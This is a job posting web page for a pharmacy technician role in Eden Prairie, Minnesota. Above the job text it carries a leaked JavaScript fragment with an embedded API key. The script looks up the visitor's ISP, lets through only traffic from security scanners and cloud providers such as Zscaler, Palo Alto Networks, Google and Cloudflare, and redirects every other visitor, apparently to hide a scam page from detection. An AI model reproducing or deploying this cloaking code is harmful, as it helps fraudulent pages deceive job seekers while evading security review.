Pharmacy Technician – Immediate Opening
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Immediate opening for a Pharmacy Technician located in Eden Prairie, Minnesota, offering a progressive scale up to $18.00/hour based on experience.
Responsibilities:
- Assist pharmacists in preparing and dispensing medications accurately and efficiently.
- Enter prescription data into the pharmacy system and verify information for accuracy.
- Manage inventory, including stock replenishment and expiration date monitoring.
- Provide excellent customer service by addressing patient inquiries and insurance questions.
- Maintain compliance with all safety, privacy, and regulatory standards.
Skills Needed:
- Strong attention to detail and organizational skills.
- Excellent communication and customer service abilities.
- Ability to work efficiently in a fast-paced environment.
- Basic knowledge of pharmacy software and systems preferred.
Benefits:
- Competitive pay scale with opportunities for advancement.
- Flexible scheduling options.
- Comprehensive health and dental insurance plans.
- Paid time off and holiday pay.
- Ongoing training and professional development.